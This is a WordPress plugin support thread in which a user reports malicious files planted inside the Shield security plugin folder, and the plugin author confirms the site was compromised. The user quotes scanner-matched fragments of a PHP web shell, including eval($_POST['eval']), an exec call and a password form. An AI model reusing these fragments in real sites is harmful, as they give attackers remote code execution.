Title: Malicious files
Last modified: June 20, 2019

---

# Malicious files

 *  Resolved [dianemk](https://wordpress.org/support/users/dianemk/)
 * (@dianemk)
 * [7 years, 2 months ago](https://wordpress.org/support/topic/malicious-files-3/)
 * I’m scanning all my sites with Wordfence because Shield didn’t pick up on a hack
   on one site, so I’m now going through all my sites with Wordfence. It has flagged
   5 potential problems in the wp-content/plugins/wp-simple-firewall path, which
   are:
    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/
   Extension/feed.php The matched text in this file is: find / -type f -name .ht
 *  wp-content/plugins/wp-simple-firewall/src/lib/vendor/nesbot/carbon/src/Carbon/
   Lang/cache.php
    The matched text in this file is: eval($_POST[‘eval’]);
 * wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/Node/
   Expression/cron.php
    The matched text in this file is: function_exists(‘exec’)){\
   x0d\x0a\x09\x09\x09@exec($cfe, $res);
 * wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/src/Node/Expression/
   Test/ajax.php
    The matched text in this file is:
 *     ```
       <form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form>
       ```
   
 * Are these legitimate Shield files? I’m not getting this on other sites with Shield.
   
   Thanks

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Plugin Author [One Dollar Plugin](https://wordpress.org/support/users/onedollarplugin/)
 * (@onedollarplugin)
 * [7 years, 2 months ago](https://wordpress.org/support/topic/malicious-files-3/#post-11656184)
 * Nope, these are not legitimate Shield files so it looks like your site’s been
   compromised. Shield has a plugin guard feature in there that would detect this
   and help repair such a compromise, though this is a Pro-only feature which wouldn’t
   be active unless you’d upgraded for the additional features.
 *  Thread Starter [dianemk](https://wordpress.org/support/users/dianemk/)
 * (@dianemk)
 * [7 years, 2 months ago](https://wordpress.org/support/topic/malicious-files-3/#post-11657124)
 * I understand that I’m using the free version and so there will be limitations
   but I have to say that I’m pretty shocked that it was a free version of Wordfence
   that alerted me to modifications in Shield files, and not Shield.
 *  Plugin Author [One Dollar Plugin](https://wordpress.org/support/users/onedollarplugin/)
 * (@onedollarplugin)
 * [7 years, 2 months ago](https://wordpress.org/support/topic/malicious-files-3/#post-11657188)
 * The nature of this is that it can turn up absolutely anywhere. If the scan isn’t
   being run, then it wont get picked up. The irony is that the files were placed
   inside the Shield folder, but again, they could be placed anywhere.
 * If you feel that the free version of another security plugin works better for
   your site than the free version of Shield, then we encourage you to make the 
   switch. You have to make the decision you feel is best for your sites.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Malicious files’ is closed to new replies.

 * ![](https://ps.w.org/wp-simple-firewall/assets/icon-256x256.png?rev=3054572)
 * [Shield Security – Smart Bot Blocking, Brute-Force Login Protection & File Scanning](https://wordpress.org/plugins/wp-simple-firewall/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wp-simple-firewall/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wp-simple-firewall/)
 * [Active Topics](https://wordpress.org/support/plugin/wp-simple-firewall/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wp-simple-firewall/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wp-simple-firewall/reviews/)

 * 3 replies
 * 2 participants
 * Last reply from: [One Dollar Plugin](https://wordpress.org/support/users/onedollarplugin/)
 * Last activity: [7 years, 2 months ago](https://wordpress.org/support/topic/malicious-files-3/#post-11657188)
 * Status: resolved